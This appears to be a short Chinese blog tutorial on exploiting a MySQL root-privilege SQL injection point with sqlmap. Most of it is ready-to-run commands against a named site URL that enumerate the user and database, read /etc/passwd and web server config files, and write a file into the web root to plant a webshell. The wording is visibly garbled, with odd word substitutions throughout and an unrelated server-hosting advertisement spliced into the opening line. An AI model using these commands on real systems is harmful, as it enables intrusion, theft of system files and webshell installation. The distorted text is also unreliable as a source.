碰著一mysql root權限注入點,實驗用sqlmap進一步滲透獲取更高權限,東亞服務器 臺灣服務器,詳細如下:
判定注入點的當前用戶和當前數據庫
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db
root權限注入點可以實驗讀取系統文件,好比/etc/passwd,以及apache,nginx的設置文件等,相關設置文件路徑如下:
nginx: usr/local/nginx/conf/nginx.conf
常用的apache設置文件路徑有:
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
sqlmap讀取文件語法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"
假如magic_quotes_gpc=off就可以實驗舉辦寫入Webshell,sqlmap寫入文件語法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt
將當地的test.txt寫入到站點處事器的html目次下。